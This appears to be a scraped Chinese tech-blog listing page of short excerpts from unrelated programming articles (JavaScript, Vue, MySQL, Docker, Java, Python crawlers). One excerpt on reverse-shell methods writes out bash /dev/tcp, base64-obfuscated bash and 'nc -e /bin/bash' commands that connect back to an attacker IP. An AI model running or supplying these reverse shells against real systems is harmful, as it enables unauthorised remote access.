文章目录一、引言二、数组的循环方式2.1for循环：最经典的遍历手段2.2forEach循环：简洁的数组迭代器2.3map循环：强大的数组映射工具2.4forof循环：ES6的迭代新宠2.5filter循环：精准的数据筛选器2.6every循环：全量条件判断专家2.7some循环：存在性条件探测器2.8find循环：快速查找首个满足项三、对象的循环方式3.1forin循环：遍历对象的基础工具3.2
【51单片机四位数码管从0循环显示到99，每0.5秒增加一个数字，打击键计数】2022-6-11 智者知已应修善业 51单片机单片机蓝桥杯经验分享笔记 c语言嵌入式硬件
缘由#include"REG52.h"unsignedcharcodesmgduan[]={0x3f,0x06,0x5b,0x4f,0x66,0x6d,0x7d,0x07,0x7f,0x6f,0x77,0x7c,0x39,0x5e,0x79,0x71,0,64,15,56};//共阴0~F消隐减号unsignedcharJs=0,miao=0;//中断计时秒分时毫秒unsignedintshu=0
什么叫精通C++ diaoqu4574
常用的面向对象复用模型设计、常用的数据结构设计、常用的操作系统知识、内存管理、多线程互斥，然后能够很轻松的应用现有的软件模块和开发库，比如用开源的库(例如log4cpp)，购买的其他公司的接口模块等，能够和容易上手应用一个你从未涉足的开发平台(比如从vc转到symbian,转到qt)，开发令老板比较满意的程序模块.十足的自信心+强烈的求知欲+对Programming&&CPP的执着+百折不挠的钻研
Vue2（二）绑定样式、条件渲染、列表渲染、监视数据原理 DogEgg_001 Vue2 vue.js 前端 javascript
目录一、绑定样式1.绑定class样式2.绑定style样式二、条件渲染1.v-show渲染方式2.v-if渲染方式三、列表渲染1.v-for（1）遍历数组*（2）遍历对象*（3）遍历字符串（4）遍历指定次数2.Key原理和作用3.列表过滤4.列表排序四、Vue监测数据变化的原理1.不能监测到变化的情况（1）无法检测通过索引修改数组的操作*（2）无法检测数组和对象的新增2.Vue监测数据的原理（1
Neo4j 图数据库安装教程（2024最新版）—— Windows / Linux / macOS 全平台指南 2501_91537435 图数据库 neo4j 数据库 windows
Neo4j图数据库安装教程（2024最新版）——Windows/Linux/macOS全平台指南Neo4j是目前最流行的图数据库（GraphDatabase），广泛应用于社交网络、推荐系统、知识图谱等领域。本文将详细介绍Windows、Linux和macOS三大平台的Neo4j安装方法，并包含配置优化、基础使用示例和常见问题解决。一、Neo4j简介1.什么是Neo4j？Neo4j是一个高性能的No
信创适配实践：ARM64 架构 KylinOS 系统下 Docker 部署 Nginx 及跨架构数据迁移全攻略 H03004 架构 docker nginx
目录一、信创背景与实践价值二、环境筹备：ARM64+KylinOS基础配置（一）系统预检：锁定架构与版本（二）Docker安装：适配KylinOS的踩坑指南1.依赖预处理（解决KylinOS源差异）2.配置ARM64专属镜像源3.安装与加速优化4.验证安装三、Nginx容器全流程：从镜像到运维（一）镜像选择：ARM64适配的核心逻辑（二）容器启动：参数解析与权限踩坑1.启动命令（含持久化挂载）2.
c++数据类型元学习研究生小白 c++基础编程语言
数据类型在创建变量或者常量时，必须指定相应的类型，否则无法给变量分配内存整型作用：表示的是整数类型的数据根据占用内存空间大小不同分为四种类型：1.short(短整型)2字节-2^15----2^15-12.int(整型)4字节-2^31----2^31-13.long(长整型)4字节-2^31----2^31-14.longlong(长长整型)8字节-2^63----2^63-1sizeof关键字
paddlepaddle测试安装_python3.7中安装paddleocr及paddlepaddle包的多种方法瓦啦
升级pippip版本必须升级到20.0.4版本才能应用；方法一、在pycharm中对pip进行升级；方法二、通过命令进行升级python3.7-mpipinstall--upgradepip下载paddleOCR下载链接：https://github.com/PaddlePaddle/PaddleOCR打开paddleOCR文件夹中requirements.txt文件，更改文件中opencv-py
研究生第一次参加国际学术会议，啥也不懂怎么办？诗远Yolanda 计算机视觉图像处理算法
第一次参加的同学也不需要太紧张，国际学术会议基本流程是三天，第一天签到，签到时间一般是从早到晚，所以不用担心自己去晚了会不会耽误赶不上。然后第二天早上8/9点开始，首先是主持人开场，有的就是会议大会主席充当主持人的角色，早上一般就是KeynoteSpeakers的报告，俗称大佬演讲，可以做做笔记啥的，中间会有一次茶歇，一般3-4个演讲之后就到中午那会了，就可以炫饭啦，一般是自助餐，可以吃饭期间认识
PaddleOCR不同模型和Paddle版本推理性能对比 dotNET跨平台 paddle
飞桨PaddleOCR这几年发布了从V2到V5的中英文OCR模型，Paddle推理框架也从2.X升级到3.0.0版本。本次对不同模型和推理框架的性能做些对比。测试条件：操作系统：win10X64CPU:13thGenIntel(R)Core(TM)i9-13900HF3.0GHz24核32线程CPU指令集：AVX,AVX2测试基于PaddleOCRSharp的C++版本SDK：https://gi
2025 AI编程工具全景图：七强横评与实战落地实战指南杜哥无敌 AI应用人工智能
—深度拆解最新技术趋势，赋能开发者效率革命一、市场现状与演进趋势：从辅助工具到开发核心引擎2025年，AI编程工具已从“代码补全插件”进化为覆盖需求分析、编码、测试、部署的全流程智能伙伴。据Gartner数据，全球75%开发者依赖AI生成代码，头部企业25%的新代码由AI生成后人工审核。技术演进呈现三大特征：多模型协同：主流工具集成GPT-4o、Claude3.7、Gemini2.0等模型，动态切
linux操作系统的软件架构分析 sunflower_w linux 运维服务器
一、linux操作系统的层次结构1.内核的主要功能1）进程管理2）内存管理3）文件系统4）进程间通信、I/O系统、网络通信协议等2.系统程序1）系统接口函数库，比如libc2)shell程序3）编译器、编辑器等基础设施3.最关键的部分1）CPU管理：进程的抽象，以及借助中断机制进行的进程管理与调度2）内存：进行地址空间的抽象,以及物理内存的分配与进程地址空间的映射3）文件：一切皆文件。通过文件系统
Linux 内核配置核心文件config与流程 sunflower_w linux 运维服务器
一、Linux内核配置核心文件与流程总览1.核心文件关系图二、核心文件详解1.Kconfig：配置选项定义文件作用：定义内核所有可配置选项（菜单、依赖关系、默认值），是配置系统的“语法规则”。位置：内核源码各子目录（如arch/arm64/Kconfig、drivers/net/Kconfig），形成层次化菜单结构。核心语法：KconfigconfigNETWORKINGbool"Networki
MCP模型上下文协议：AI人工智能模型训练的自动化调参 AI天才研究院 AI人工智能与大数据人工智能自动化运维 ai
MCP模型上下文协议：AI人工智能模型训练的自动化调参关键词：MCP模型、自动化调参、AI训练、超参数优化、上下文协议、机器学习、深度学习摘要：本文深入探讨MCP模型上下文协议在AI模型训练自动化调参中的应用。MCP(ModelContextProtocol)是一种创新的自动化调参框架，通过上下文感知和动态参数调整机制，显著提升模型训练效率和性能。文章将从理论基础、算法实现、数学原理到实际应用进行
ShardingProxy-分库分表菜逼の世界 ShardingSphere ShardingSphere ShardingProxy 分表分库
ShardingProxy获取资源包下载地址ShardingProxy当前使用版本4.1.1安装apache-shardingsphere-4.1.1-sharding-proxy-bin.tar.gz解压即可目录说明bin:启动脚本start.bat:window启动脚本start.sh:linux启动脚本stop.sh:linux停止脚本conf：配置文件server
利用ShadowRoot 实现样式隔离 Helson@lin javascript chrome devtools
ShadowRootShadowDOMAPI的ShadowRoot接口是一个DOM子树的根节点，它与文档的主DOM树分开渲染。ShadowRoot的模式——可以是open或者closed。这定义了shadowroot的内部实现是否可被JavaScript访问及修改—也就是说ShadowRoot的特性图片来源：掘金（https://juejin.cn/post/6979489951108825095
爬虫基础-urllib库的使用 a little peanut Python3网络爬虫 python 爬虫开发语言
注：本文章为学习过程中对知识点的记录，供自己复习使用，也给大家做个参考，如有错误，麻烦指出，大家共同探讨，互相进步。借鉴出处：该文章的路线和主要内容：崔庆才（第2版）python3网络爬虫开发实战bytes类型：https://blog.csdn.net/apple_50618492/article/details/114677967python中文官网：https://docs.python.o
Python3爬虫笔记 -- urllib Alst0n Python Python3 urllib urllib.request
urllib库是Python内置的HTTP请求库，不需要额外安装。它包含如下4个模块：request：HTTP请求模块error：异常处理模块parse：提供URL处理方法，包括拆分、解析、合并等robotparser：识别网站等robot.txt文件1、urllib.request发送请求连接URL，获取返回页面的源代码；默认请求方式为GETimporturllib.requestrespons
Python网络爬虫---urllib库介绍 db_hsk_2099 python 爬虫开发语言
1·urllib库简介·用途：urllib库是python的标准库之一，是python内置的HTTP请求库，用于发送HTTP/FTP请求，它可以看作处理URL的组件集合。·特点：简单易用，支持HTTP、HTTPS、FTP等协议。2.urllib库包含4大模块：目录：（1）urllib.request（2）urllib.parse（3）urllib.error（4）urllib.robotparse
C# 讯飞语音唤醒 jones.s c#
publicpartialclassMainWindow:Window{//导入C/C++的库文件[DllImport("msc_x64.dll",CallingConvention=CallingConvention.Winapi)]publicstaticexternintMSPLogin(stringusername,stringpassword,stringloginParams);[Dl
各种shell反弹方法 !QK linux 网络安全安全 web安全 bash
1.利用bash进行反弹shell先使用nc进行监听nc-lvvpport端口号再在目标机器执行bash-i>&/dev/tcp/攻击ip/端口0>&1bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjcvMjIzMyAwPiYx}|{base64,-d}|{bash,-i}2.使用nc进行反弹shellnc-e/bin/bash攻击IP端
如何利用股票API获取实时行情数据？有哪些好用的股票API推荐？财云量化 python炒股自动化量化交易程序化交易股票api 实时行情数据获取方法 api推荐股票量化接口股票API接口
炒股自动化：申请官方API接口，散户也可以python炒股自动化（0），申请券商API接口python炒股自动化（1），量化交易接口区别Python炒股自动化（2）：获取股票实时数据和历史数据Python炒股自动化（3）：分析取回的实时数据和历史数据Python炒股自动化（4）：通过接口向交易所发送订单Python炒股自动化（5）：通过接口查询订单，查询账户资产股票量化，Python炒股，CSDN
RK3288解码视频时遇到的奇葩问题 melonbo 百问 -音视频音视频
1、亮线问题用rk3288做视频显示，qt界面是1024x768，在切换视频源时，屏幕偶尔会出现亮线，位置在屏幕的正中间。解决方法是将qt的界面设置为1023x767，完美解决。2、亮点rk3288在解码显示h264视频时，界面的图像会出现斑驳的亮点，不仔细看还看不出来，出现的亮点有的在视频图像上，有的在qt界面上。解决方法是在现实图像界面前，先用ffplay播放一个全屏的画面，然后再显示程序的界
多线程编程之卫生间周凡杨 java 并发卫生间线程厕所
如大家所知，火车上车厢的卫生间很小，每次只能容纳一个人，一个车厢只有一个卫生间，这个卫生间会被多个人同时使用，在实际使用时，当一个人进入卫生间时则会把卫生间锁上，等出来时打开门，下一个人进去把门锁上，如果有一个人在卫生间内部则别人的人发现门是锁的则只能在外面等待。问题分析：首先问题中有两个实体，一个是人，一个是厕所，所以设计程序时就可以设计两个类。人是多数的，厕所只有一个（暂且模拟的是一个车厢）。
How to Install GUI to Centos Minimal sunjing linux Install Desktop GUI
http://www.namhuy.net/475/how-to-install-gui-to-centos-minimal.html I have centos 6.3 minimal running as web server. I’m looking to install gui to my server to vnc to my server. You can insta
Shell 函数 daizj shell 函数
Shell 函数 linux shell 可以用户定义函数，然后在shell脚本中可以随便调用。 shell中函数的定义格式如下： [function] funname [()]{ action; [return int;] } 说明： 1、可以带function fun() 定义，也可以直接fun() 定义,不带任何参数。 2、参数返回
Linux服务器新手操作之一周凡杨 Linux 简单操作
1.whoami 当一个用户登录Linux系统之后，也许他想知道自己是发哪个用户登录的。此时可以使用whoami命令。 [ecuser@HA5-DZ05 ~]$ whoami e
浅谈Socket通信（一）朱辉辉33 socket
在java中ServerSocket用于服务器端，用来监听端口。通过服务器监听，客户端发送请求，双方建立链接后才能通信。当服务器和客户端建立链接后，两边都会产生一个Socket实例，我们可以通过操作Socket来建立通信。首先我建立一个ServerSocket对象。当然要导入java.net.ServerSocket包 ServerSock
关于框架的简单认识西蜀石兰框架
入职两个月多，依然是一个不会写代码的小白，每天的工作就是看代码，写wiki。前端接触CSS、HTML、JS等语言，一直在用的CS模型，自然免不了数据库的链接及使用，真心涉及框架，项目中用到的BootStrap算一个吧，哦，JQuery只能算半个框架吧，我更觉得它是另外一种语言。后台一直是纯Java代码，涉及的框架是Quzrtz和log4j。都说学前端的要知道三大框架，目前node.
You have an error in your SQL syntax; check the manual that corresponds to your 林鹤霄
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'option,changed_ids ) values('0ac91f167f754c8cbac00e9e3dc372
MySQL5.6的my.ini配置 aigo mysql
注意：以下配置的服务器硬件是：8核16G内存 [client] port=3306 [mysql] default-character-set=utf8 [mysqld] port=3306 basedir=D:/mysql-5.6.21-win
mysql 全文模糊查找便捷解决方案 alxw4616 mysql
mysql 全文模糊查找便捷解决方案 2013/6/14 by 半仙 [email protected] 目的: 项目需求实现模糊查找. 原则: 查询不能超过 1秒. 问题: 目标表中有超过1千万条记录. 使用like '%str%' 进行模糊查询无法达到性能需求. 解决方案: 使用mysql全文索引. 1.全文索引 : MySQL支持全文索引和搜索功能。MySQL中的全文索
自定义数据结构链表(单项 ,双向,环形) 百合不是茶单项链表双向链表
链表与动态数组的实现方式差不多, 数组适合快速删除某个元素链表则可以快速的保存数组并且可以是不连续的单项链表;数据从第一个指向最后一个实现代码: //定义动态链表 clas
threadLocal实例 bijian1013 java thread java多线程 threadLocal
实例1： package com.bijian.thread; public class MyThread extends Thread { private static ThreadLocal tl = new ThreadLocal() { protected synchronized Object initialValue() { return new Inte
activemq安全设置—设置admin的用户名和密码 bijian1013 java activemq
ActiveMQ使用的是jetty服务器, 打开conf/jetty.xml文件，找到 <bean id="adminSecurityConstraint" class="org.eclipse.jetty.util.security.Constraint"> <p
【Java范型一】Java范型详解之范型集合和自定义范型类 bit1129 java
本文详细介绍Java的范型，写一篇关于范型的博客原因有两个，前几天要写个范型方法(返回值根据传入的类型而定)，竟然想了半天，最后还是从网上找了个范型方法的写法；再者，前一段时间在看Gson, Gson这个JSON包的精华就在于对范型的优雅简单的处理，看它的源代码就比较迷糊，只其然不知其所以然。所以，还是花点时间系统的整理总结下范型吧。范型内容范型集合类范型类
【HBase十二】HFile存储的是一个列族的数据 bit1129 hbase
在HBase中，每个HFile存储的是一个表中一个列族的数据，也就是说，当一个表中有多个列簇时，针对每个列簇插入数据，最后产生的数据是多个HFile，每个对应一个列族，通过如下操作验证 1. 建立一个有两个列族的表 create 'members','colfam1','colfam2' 2. 在members表中的colfam1中插入50*5
Nginx 官方一个配置实例 ronin47 nginx 配置实例
user www www; worker_processes 5; error_log logs/error.log; pid logs/nginx.pid; worker_rlimit_nofile 8192; events { worker_connections 4096;} http { include conf/mim
java-15.输入一颗二元查找树，将该树转换为它的镜像，即在转换后的二元查找树中，左子树的结点都大于右子树的结点。用递归和循环 bylijinnan java
//use recursion public static void mirrorHelp1(Node node){ if(node==null)return; swapChild(node); mirrorHelp1(node.getLeft()); mirrorHelp1(node.getRight()); } //use no recursion bu
返回null还是empty bylijinnan java apache spring 编程
第一个问题，函数是应当返回null还是长度为0的数组（或集合）？第二个问题，函数输入参数不当时，是异常还是返回null？先看第一个问题有两个约定我觉得应当遵守： 1.返回零长度的数组或集合而不是null（详见《Effective Java》）理由就是，如果返回empty，就可以少了很多not-null判断： List<Person> list
[科技与项目]工作流厂商的战略机遇期 comsci 工作流
在新的战略平衡形成之前，这里有一个短暂的战略机遇期，只有大概最短6年，最长14年的时间，这段时间就好像我们森林里面的小动物，在秋天中，必须抓紧一切时间存储坚果一样，否则无法熬过漫长的冬季。。。。在微软，甲骨文，谷歌，IBM,SONY
过度设计-举例 cuityang 过度设计
过度设计，需要更多设计时间和测试成本，如无必要，还是尽量简洁一些好。未来的事情，比如访问量，比如数据库的容量，比如是否需要改成分布式都是无法预料的再举一个例子，对闰年的判断逻辑：　　1、 if($Year%4==0) return True; else return Fasle; 　　2、if ( ($Year%4==0 &am
java进阶，《Java性能优化权威指南》试读 darkblue086 java性能优化
记得当年随意读了微软出版社的.NET 2.0应用程序调试，才发现调试器如此强大，应用程序开发调试其实真的简单了很多，不仅仅是因为里面介绍了很多调试器工具的使用，更是因为里面寻找问题并重现问题的思想让我震撼，时隔多年，Java已经如日中天，成为许多大型企业应用的首选，而今天，这本《Java性能优化权威指南》让我再次找到了这种感觉，从不经意的开发过程让我刮目相看，原来性能调优不是简单地看看热点在哪里，
网络学习笔记初识OSI七层模型与TCP协议 dcj3sjt126com 学习笔记
协议：在计算机网络中通信各方面所达成的、共同遵守和执行的一系列约定　　计算机网络的体系结构：计算机网络的层次结构和各层协议的集合。　　两类服务：　　面向连接的服务通信双方在通信之前先建立某种状态，并在通信过程中维持这种状态的变化，同时为服务对象预先分配一定的资源。这种服务叫做面向连接的服务。　　面向无连接的服务通信双方在通信前后不建立和维持状态，不为服务对象
mac中用命令行运行mysql dcj3sjt126com mysql linux mac
参考这篇博客：http://www.cnblogs.com/macro-cheng/archive/2011/10/25/mysql-001.html 感觉workbench不好用（有点先入为主了）。 1，安装mysql 在mysql的官方网站下载 mysql 5.5.23 http://www.mysql.com/downloads/mysql/，根据我的机器的配置情况选择了64
MongDB查询（1）——基本查询[五] eksliang mongodb mongodb 查询 mongodb find
MongDB查询转载请出自出处：http://eksliang.iteye.com/blog/2174452 一、find简介 MongoDB中使用find来进行查询。 API:如下 function ( query , fields , limit , skip, batchSize, options ){.....} 参数含义： query:查询参数 fie
base64，加密解密经融加密，对接 y806839048 经融加密对接
String data0 = new String(Base64.encode(bo.getPaymentResult().getBytes(("GBK")))); String data1 = new String(Base64.decode(data0.toCharArray()),"GBK"); // 注意编码格式，注意用于加密，解密的要是同
JavaWeb之JSP概述 ihuning javaweb
什么是JSP？为什么使用JSP？ JSP表示Java Server Page，即嵌有Java代码的HTML页面。使用JSP是因为在HTML中嵌入Java代码比在Java代码中拼接字符串更容易、更方便和更高效。 JSP起源在很多动态网页中，绝大部分内容都是固定不变的，只有局部内容需要动态产生和改变。如果使用Servl
apple watch 指南啸笑天 apple
1. 文档 WatchKit Programming Guide（中译在线版 By @CocoaChina）译文译者原文概览 - 开始为 Apple Watch 进行开发 @星夜暮晨 Overview - Developing for Apple Watch 概览 - 配置 Xcode 项目 - Overview - Configuring Yo
java经典的基础题目 macroli java 编程
1.列举出 10个JAVA语言的优势 a:免费，开源，跨平台(平台独立性)，简单易用，功能完善，面向对象，健壮性，多线程，结构中立，企业应用的成熟平台, 无线应用 2.列举出JAVA中10个面向对象编程的术语 a:包，类，接口，对象，属性，方法，构造器，继承，封装，多态，抽象，范型 3.列举出JAVA中6个比较常用的包 Java.lang;java.util;java.io;java.sql;ja
你所不知道神奇的js replace正则表达式 qiaolevip 每天进步一点点学习永无止境纵观千象 regex
var v = 'C9CFBAA3CAD0'; console.log(v); var arr = v.split(''); for (var i = 0; i < arr.length; i ++) { if (i % 2 == 0) arr[i] = '%' + arr[i]; } console.log(arr.join('')); console.log(v.r
[一起学Hive]之十五-分析Hive表和分区的统计信息(Statistics) superlxw1234 hive hive分析表 hive统计信息 hive Statistics
关键字：Hive统计信息、分析Hive表、Hive Statistics 类似于Oracle的分析表，Hive中也提供了分析表和分区的功能，通过自动和手动分析Hive表，将Hive表的一些统计信息存储到元数据中。表和分区的统计信息主要包括：行数、文件数、原始数据大小、所占存储大小、最后一次操作时间等； 14.1 新表的统计信息对于一个新创建
Spring Boot 1.2.5 发布 wiselyman spring boot
Spring Boot 1.2.5已在7月2日发布，现在可以从spring的maven库和maven中心库下载。这个版本是一个维护的发布版，主要是一些修复以及将Spring的依赖提升至4.1.7(包含重要的安全修复)。官方建议所有的Spring Boot用户升级这个版本。项目首页 | 源

SIGAI深度学习第十集 卷积神经网络4

你可能感兴趣的:(SIGAI深度学习第十集 卷积神经网络4)

SIGAI深度学习第十集卷积神经网络4

你可能感兴趣的:(SIGAI深度学习第十集卷积神经网络4)